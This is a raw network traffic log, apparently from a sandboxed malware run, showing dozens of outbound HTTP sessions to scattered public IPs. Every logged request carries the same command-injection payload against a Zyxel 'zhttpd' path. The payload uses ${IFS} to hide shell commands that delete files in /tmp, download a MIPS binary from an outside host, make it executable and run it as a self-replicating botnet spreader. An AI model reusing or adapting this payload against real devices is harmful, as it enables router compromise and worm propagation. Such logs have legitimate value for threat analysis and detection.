                                                        Feb 2, 2024 06:21:05.859833956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3539192.168.2.1446056188.21.113.128443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.859878063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3540192.168.2.143837271.80.92.184443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.859914064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3541192.168.2.1439998131.118.220.83443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.859935999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3542192.168.2.1435940122.209.14.250443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.859971046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3543192.168.2.145620868.185.91.250443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.860032082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3544192.168.2.1453464213.52.64.147443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.860068083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3545192.168.2.1446230181.134.3.236443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.860094070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3546192.168.2.145928468.196.208.123443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.860143900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3547192.168.2.1449434143.218.19.11443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.860191107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3548192.168.2.1453460125.151.6.111443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.860234022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3549192.168.2.1435380197.37.170.52443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.860285997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3550192.168.2.1434036176.26.140.45443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.860332012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3551192.168.2.1453450158.59.74.36443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.860364914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3552192.168.2.145686671.218.78.89443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.860407114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3553192.168.2.1433742177.155.209.178443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.860435009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3554192.168.2.145910231.127.138.180443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.860477924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3555192.168.2.145499054.238.155.221443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.860517025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3556192.168.2.145326666.189.138.0443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.860549927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3557192.168.2.145859462.87.97.174443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.860596895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3558192.168.2.1439330201.136.111.233443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.860656023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3559192.168.2.144223097.56.74.90443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.860688925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3560192.168.2.145984658.41.136.29443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.860721111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3561192.168.2.143840043.41.87.161443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.860770941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3562192.168.2.1452742188.85.193.111443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.860811949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3563192.168.2.1451010153.21.147.68443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.860840082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3564192.168.2.145460690.75.161.90443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.860897064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3565192.168.2.1433918145.46.87.239443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.860933065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3566192.168.2.1434132212.69.131.7443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.860994101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3567192.168.2.1451320207.53.177.12443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.861021042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3568192.168.2.143671460.225.130.196443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.861068964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3569192.168.2.145034882.138.2.126443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.861120939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3570192.168.2.1435160188.251.15.71443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.861134052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3571192.168.2.1440834154.218.27.103443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.861180067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3572192.168.2.1452938204.48.182.69443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.861207962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3573192.168.2.1452910103.229.160.19443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.861260891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3574192.168.2.145255020.241.36.196443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.861283064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3575192.168.2.144907241.206.198.170443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.861346006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3576192.168.2.1455140133.238.238.165443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.861363888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3577192.168.2.1439970119.189.148.75443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.861423969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3578192.168.2.1442892138.181.95.18443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.861463070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3579192.168.2.1444762131.241.102.87443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.861507893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3580192.168.2.143504693.42.235.215443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.861550093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3581192.168.2.145449488.253.96.130443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.861587048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3582192.168.2.144617644.224.114.193443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.861635923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3583192.168.2.1449454185.56.218.37443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.861663103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3584192.168.2.1436624212.34.193.221443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.861717939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3585192.168.2.1438254173.76.16.15443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.861767054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3586192.168.2.1438690203.206.31.164443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.861795902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3587192.168.2.143322825.137.234.146443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.865389109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3588192.168.2.143573246.203.22.16443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.865427971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3589192.168.2.1449352110.15.8.22443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.865484953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3590192.168.2.1448326179.150.88.55443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.865511894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3591192.168.2.1459454119.96.134.193443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.865535975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3592192.168.2.1448810202.140.14.166443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.865564108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3593192.168.2.1460100134.84.237.44443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.865602970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3594192.168.2.1435952183.78.239.227443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.865647078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3595192.168.2.14479624.38.96.225443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.865695000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3596192.168.2.1446906154.54.129.110443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.874006033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3597192.168.2.1454882123.186.42.208443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.874057055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3598192.168.2.1438678161.172.68.163443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.874092102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3599192.168.2.1459166179.45.174.37443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.874134064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3600192.168.2.143763268.243.182.30443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.874177933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3601192.168.2.1452524142.63.21.237443
                                                        TimestampBytes transferredDirectionData
